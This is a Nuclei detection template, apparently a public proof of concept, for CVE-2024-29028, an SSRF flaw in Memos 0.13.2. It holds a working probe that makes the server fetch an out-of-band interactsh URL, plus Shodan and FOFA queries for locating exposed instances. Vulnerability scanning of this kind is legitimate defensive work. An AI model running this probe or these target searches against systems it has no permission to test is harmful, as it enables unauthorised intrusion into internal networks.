SSRF vulnerabilities exist in the memos API service `/o/get/httpmeta` that allow unauthenticated and authenticated users to enumerate and read from the internal network. In addition, one SSRF vulnerability leads to a reflected XSS vulnerability, which may allow an attacker complete control over the administrator account.
PoC代码[已公开]
id: CVE-2024-29028
info:
name: Memos 0.13.2 - Server-Side Request Forgery
author: ritikchaddha
severity: medium
description: |
SSRF vulnerabilities exist in the memos API service `/o/get/httpmeta` that allow unauthenticated and authenticated users to enumerate and read from the internal network. In addition, one SSRF vulnerability leads to a reflected XSS vulnerability, which may allow an attacker complete control over the administrator account.
reference:
- https://securitylab.github.com/advisories/GHSL-2023-154_GHSL-2023-156_memos/
- https://nvd.nist.gov/vuln/detail/CVE-2024-29028
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-918
cve-id: CVE-2024-29028
epss-score: 0.05952
epss-percentile: 0.90288
metadata:
verified: true
max-request: 1
shodan-query: title:"Memos"
fofa-query: title="Memos"
tags: cve,cve2024,ssrf,memos
http:
- method: GET
path:
- "{{BaseURL}}/o/get/httpmeta?url=https://{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(interactsh_protocol, "dns")'
- 'contains_any(tolower(body), "memos", "title\":")'
condition: and
# digest: 4a0a0047304502207a9b699850676032d4a47b77ad283aadf710c11029e71392462c7d416bef95d2022100918769ef2e7f40d58c8788c4e6618daf624c31ad0cdabf385084407d631e6a22:922c64590222798bb761d5b6d8e72950